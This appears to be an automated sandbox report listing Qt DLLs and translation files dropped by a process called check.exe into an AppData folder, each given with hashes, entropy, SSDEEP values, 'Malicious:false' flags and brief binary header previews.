                                                                                                                                                                                                            MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                            SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                            SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                            SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38384
                                                                                                                                                                                                            Entropy (8bit):5.957072398645384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                            MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                            SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                            SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                            SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):421360
                                                                                                                                                                                                            Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                            MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                            SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                            SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                            SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32240
                                                                                                                                                                                                            Entropy (8bit):5.978149408776758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                            MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                            SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                            SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                            SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):5.865766652452823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                            MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                            SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                            SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                            SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390128
                                                                                                                                                                                                            Entropy (8bit):5.724665470266677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                            MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                            SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                            SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                            SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30192
                                                                                                                                                                                                            Entropy (8bit):5.938644231596902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                            MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                            SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                            SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                            SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510448
                                                                                                                                                                                                            Entropy (8bit):6.605517748735854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                            MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                            SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                            SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                            SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):844784
                                                                                                                                                                                                            Entropy (8bit):6.625808732261156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                            MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                            SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                            SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                            SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):754672
                                                                                                                                                                                                            Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                            MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                            SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                            SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                            SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):482288
                                                                                                                                                                                                            Entropy (8bit):6.152380961313931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                            MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                            SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                            SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                            SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1477104
                                                                                                                                                                                                            Entropy (8bit):6.575113537540671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                            MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                            SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                            SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                            SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68592
                                                                                                                                                                                                            Entropy (8bit):6.125954940500008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                            MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                            SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                            SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                            SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144368
                                                                                                                                                                                                            Entropy (8bit):6.294675868932723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                            MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                            SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                            SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                            SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):130
                                                                                                                                                                                                            Entropy (8bit):4.024232093209084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                            MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                            SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                            SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                            SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                            MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                            SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                            SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                            SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.631479835393124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                            MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                            SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                            SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                            SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                            MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                            SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                            SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                            SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                            MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                            SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                            SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
